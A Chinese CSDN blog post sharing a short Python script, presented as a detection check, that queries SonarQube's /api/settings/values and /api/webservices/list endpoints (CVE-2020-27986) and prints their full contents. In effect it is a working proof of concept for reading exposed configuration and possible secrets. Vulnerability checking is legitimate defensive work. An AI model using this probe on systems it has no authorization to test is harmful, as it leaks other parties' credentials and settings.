CVE-2020-27986(SonarQube敏感信息泄露)检测脚本

下一遍:CVE-2021-41773、CVE-2021-42013检测脚本_dreamthe的博客-CSDN博客

我自己写的一个简单检测CVE-2020-27986漏洞的脚本。仅供参考

import argparse
import json
import sys
import requests



def options():
    parser = argparse.ArgumentParser()
    parser.add_argument('-m', '--module', default='', dest='action_name', required=True,
                        help='模块的英文名称, 必填参数')
    parser.add_argument('-d', '--dict', dest='json_data', required=True,
                        help='目标url')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s 1.0')
    params = parser.parse_args()
    execute(params.action_name, json_data=params.json_data)


def usage():
    print('''
                へ     /|
              /\7    ∠_/
              / │   / /
             │ Z _,< /   /`ヽ
             │     ヽ   /  〉
              Y     `  /  /
             イ● 、 ●  ⊂⊃〈  /
             ()  へ    | \〈
              >ー 、_  ィ  │ //
              / へ   / ノ<| \\
              ヽ_ノ  (_/  │//
              7       |/
              >―r ̄ ̄`ー―_
      ''')
    print('\n')


def execute(action_name, json_data):

    if action_name == 'CVE-2020-27986':
        result = CVE_2020_27986(json_data)
    else:
        result = []
    print(result)
    return result


def CVE_2020_27986(url):
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Upgrade-Insecure-Requests': '1'
    }
    payload = ['/api/settings/values', '/api/webservices/list']
    for poc in payload:
        target_url = url + poc
        try:
            res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
            result = {'url': target_url, 'code': res.status_code,'data': res.text}
            return result
        except Exception as e:
            print(e)


if __name__ == '__main__':
    usage()
    options()

使用方法:

打开cmd 输入命令 python3环境

python pocscheckr.py -m CVE-2020-27986 -d http://www.example.com

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值